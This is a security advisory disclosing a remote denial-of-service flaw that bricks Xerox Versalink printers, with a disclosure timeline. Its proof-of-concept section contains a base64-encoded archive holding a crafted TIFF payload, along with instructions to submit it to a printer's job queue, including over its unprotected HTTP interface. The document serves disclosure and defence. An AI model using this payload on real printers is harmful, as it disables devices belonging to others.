[+] Credits: Mahmoud Al-Qudsi [+] Website: https://neosmart.net/ [+] Source: https://neosmart.net/blog/?p=4865 [+] Media: https://twitter.com/mqudsi and https://twitter.com/neosmart [Vendor] Xerox Corporation [Product] Xerox Versalink printers, other Xerox printers/copiers. [Vulnerability Type] Remote denial-of-service leading to bricked device. [Security Issue] A specifically crafted TIFF payload may be submitted to the printer's job queue (in person or over the network) by unauthenticated/unprivileged users or network or internet attackers by means of a JavaScript payload. The device will panic upon attempting to read the submitted file and a physical reboot will be required. Upon reboot, the device will attempt to resume the last-printed job, triggering the panic once more. The process repeats ad-infinitum. [Exploit/PoC] Extract the TIFF contents of the base64-encode archive below and submit directly to the job queue on a vulnerable printer to trigger the exploit: UmFyIRoHAQAzkrXlCgEFBgAFAQGAgAD5BbdHEwMC5QAE5QAA9kPUNIAAAANDTVRYZXJveCByZW1v dGUgYnJpY2sgcGF5bG9hZCBieSBNYWhtb3VkIEFsLVF1ZHNpDQpTZWUgaHR0cHM6Ly9uZW9zbWFy dC5uZXQvYmxvZy8/cD00ODY1IGZvciBtb3JlIGluZm8uAOsG2ysrAgMLjQEEvAMgCd+uuYADAA94 ZXJveCBicmljay50aWYKAwIA/Fsg4nPVAcISiiBENSb2YDSTz9+g+ofkEQVoaUFeJvK3kDY8WbGp HgjY0bFPe8gzgjwjaJNmzSGzlGGm0ZRkySYEISicQttsKElCEti8EbSsdkcDz6/WmRz/N1o/EIEf YPQUn+fPO4RLXjWeRbJT8isQTI5AnW6pF0WsD5DaxM4tgNHp3U7xR1fsHuvMYwMeDGyHIB13VlED BQQA [Network Access] Local or remote The sample payload may also be submitted to exploit a Xerox printer with a known ip address or host name over the web by taking advantage of the unprotected HTTP POST interface exposed by the device on its network interface. [Severity] Critical The denial-of-service attack results in a semi-permanent "bricking" of the Xerox printer. Recovery may be possible if there are unapplied firmware updates by forcing an update over the network, which clears the job queue in the process. Otherwise, manually clearing the non-volatile storage memory on the device's mainboard is required to break out of the loop. [Disclosure Timeline] - September 26, 2019: Reported to Xerox - January 14, 2020: Confirmed by Xerox in response to a request for updates - January 25, 2022: Publicly disclosed, remains unpatched and exploitable Mahmoud